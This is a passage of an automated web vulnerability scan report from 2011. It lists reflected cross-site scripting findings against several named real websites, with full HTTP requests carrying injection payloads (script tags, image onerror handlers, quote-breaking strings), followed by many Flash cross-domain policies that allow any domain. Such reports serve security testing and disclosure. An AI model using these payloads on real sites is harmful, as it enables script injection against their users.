GET /stylesheets/b869f\"%3bff4d86bda9a/topic-s_righthealth-chimborazo-153574.css?1305489648 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:22 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=stylesheets; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:22 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:22 GMT;path=/
Content-Length: 20785

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "ffeeb640-615b-012e-af22-003048fe49ee";
   kl.svid = "1651647200";
   kl.query = "B869f\\";ff4d86bda9a";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.righthealth.com/";
   kl.build_id = '153574';
   kl.rel
...[SNIP]...

4.58. http://www.tagged.com/api/ [data parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /api/

Issue detail

The value of the data request parameter is copied into the HTML document as plain text between tags. The payload 6975f<img%20src%3da%20onerror%3dalert(1)>70a7439d138 was submitted in the data parameter. This input was echoed as 6975f<img src=a onerror=alert(1)>70a7439d138 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /api/?application_id=user&format=json&session_token=k48nnbumc29k7tunhd4mautaa0 HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/forgot_password.html
Origin: http://www.tagged.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=k48nnbumc29k7tunhd4mautaa0; __qca=P0-1020015937-1305484533946; __utmz=50703532.1305484534.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.202314569.1305484534.1305484534.1305484534.1; __utmb=50703532.0.10.1305484534; __utmc=50703532
Content-Length: 299


method=tagged.header.renderAlerts&callback=tagged.header.alerts.show&api_signature=&track=pkXrwJtpd9
method=tagged.util.echoIt&data=6975f<img%20src%3da%20onerror%3dalert(1)>70a7439d138&callback=tagged.header.alerts.init&api_signature=&track=pkXrwJtpd9
method=tagged.util.echoIt&data=300&callback=TAGGED.api.startDefer&api_signature=&track=pkXrwJtpd9

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:38:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 263

["{\"stat\":\"ok\",\"diagnostics\":\"0 2.3 27.50\",\"result\":{\"HTML\":\"\"}}","{\"stat\":\"ok\",\"diagnostics\":\"0 2.3 27.50\",\"result\":\"6975f<img src=a onerror=alert(1)>70a7439d138\"}","{\"stat\":\"ok\",\"diagnostics\":\"0 2.3 27.50\",\"result\":\"300\"}"]

4.59. http://www.tagged.com/api/ [data parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /api/

Issue detail

The value of the data request parameter is copied into the HTML document as plain text between tags. The payload fe9eb<img%20src%3da%20onerror%3dalert(1)>86b79eec8684e9321 was submitted in the data parameter. This input was echoed as fe9eb<img src=a onerror=alert(1)>86b79eec8684e9321 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /api/?application_id=user&format=json&session_token=k48nnbumc29k7tunhd4mautaa0&method=tagged.header.renderAlerts&callback=tagged.header.alerts.show&api_signature=&track=pkXrwJtpd9&method=tagged.util.echoIt&data=&callback=tagged.header.alerts.init&api_signature=&track=pkXrwJtpd9&method=tagged.util.echoIt&data=300fe9eb<img%20src%3da%20onerror%3dalert(1)>86b79eec8684e9321&callback=TAGGED.api.startDefer&api_signature=&track=pkXrwJtpd9 HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/forgot_password.html
Origin: http://www.tagged.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=k48nnbumc29k7tunhd4mautaa0; __qca=P0-1020015937-1305484533946; __utmz=50703532.1305484534.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.202314569.1305484534.1305484534.1305484534.1; __utmb=50703532.0.10.1305484534; __utmc=50703532

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:41:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 106

{"stat":"ok","diagnostics":"1 2.3 26.64","result":"300fe9eb<img src=a onerror=alert(1)>86b79eec8684e9321"}

4.60. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://medienfreunde.com
Path:   /lab/innerfade/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32395"><script>alert(1)</script>94fad20c9dc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /lab/innerfade/ HTTP/1.1
Host: medienfreunde.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: 32395"><script>alert(1)</script>94fad20c9dc

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:36:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 14728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<!-- saved from url=(0013)about:internet -->
   <hea
...[SNIP]...
<iframe src="http://pingomatic.com/ping/?title=Corporate+Design&blogurl=32395"><script>alert(1)</script>94fad20c9dc&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo
...[SNIP]...

4.61. http://www.kosmix.com/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 953d7'-alert(1)-'f7617ef5c29 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24953d7'-alert(1)-'f7617ef5c29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:01:14 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: kid=02e66700-615c-012e-dbad-003048fe3090; path=/; expires=Sat, 15-May-2021 20:01:14 GMT
Set-Cookie: as=ref_absent; path=/; expires=Sat, 15-May-2021 20:01:14 GMT
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:01:14 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:03:14 GMT;path=/
Content-Length: 15708

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
   
   kl.page_type = 'o';
   kl.initialize();
   kapp.page = 'true';
   kapp.searchCookie = ['kosmix','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24953d7'-alert(1)-'f7617ef5c29'];
   </script>
...[SNIP]...

4.62. http://www.righthealth.com/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c514c'-alert(1)-'909ad3854c2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24c514c'-alert(1)-'909ad3854c2
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:02:31 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: kid=30f335e0-615c-012e-a7e8-003048fe47fa; path=/; expires=Sat, 15-May-2021 20:02:31 GMT
Set-Cookie: as=ref_absent; path=/; expires=Sat, 15-May-2021 20:02:31 GMT
Set-Cookie: KC=K; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:02:31 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:17:31 GMT;path=/
Content-Length: 56037

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
.page_type = 'o';
   kl.initialize();
   kapp.page = 'true';
   kapp.searchCookie = ['righthealth','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24c514c'-alert(1)-'909ad3854c2'];
   </script>
...[SNIP]...

5. Flash cross-domain policy
There are 44 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://a.dlqm.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.dlqm.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.dlqm.net

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:35:52 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "2005439f-d1-4100ff999c240"
Accept-Ranges: bytes
Content-Length: 209
Keep-Alive: timeout=120, max=160
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.2. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Sun, 15 May 2011 18:35:46 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.3. http://ads.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:1394"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Sun, 15 May 2011 18:35:47 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

5.4. http://ajax.googleapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Sun, 15 May 2011 20:42:29 GMT
Date: Sat, 14 May 2011 20:42:29 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 75190

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.5. http://amch.questionmarket.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:35:50 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "2005439f-d1-f999c240"
Accept-Ranges: bytes
Content-Length: 209
Keep-Alive: timeout=120, max=890
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.6. http://api.facebook.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Tue, 14 Jun 2011 20:01:15 GMT
X-FB-Server: 10.42.60.67
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

5.7. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 16 May 2011 18:23:54 GMT
Date: Sun, 15 May 2011 18:23:54 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

5.8. http://bh.contextweb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
ETag: W/"384-1279205345000"
Last-Modified: Thu, 15 Jul 2010 14:49:05 GMT
Content-Type: application/xml
Content-Length: 384
Date: Sun, 15 May 2011 18:35:34 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.9. http://bs.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:23:02 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


5.10. http://c.betrad.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Sun, 15 May 2011 18:38:34 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.11. http://c5.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c5.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c5.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:04:15 GMT
ETag: "77adf2-f7-44d91a5da81c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 247
Date: Sun, 15 May 2011 18:35:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.12. http://c7.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 247
Content-Type: application/xml
ETag: "77adf2-f7-44d91a5da81c0"
X-Varnish: 1215537576
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=3585
Date: Sun, 15 May 2011 18:35:37 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.13. https://console.iservices.net.nz/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://console.iservices.net.nz
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: console.iservices.net.nz

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:33:30 GMT
Server: Apache
Last-Modified: Sat, 29 May 2010 23:33:46 GMT
ETag: "5c820f-c9-487c40e0e4a80"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.14. http://ds.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Sun, 15 May 2011 17:35:37 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


5.15. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 16-May-2011 18:35:56 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.16. http://l.betrad.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.betrad.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Type: text/xml
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 212

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-do
...[SNIP]...

5.17. http://log30.doubleverify.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
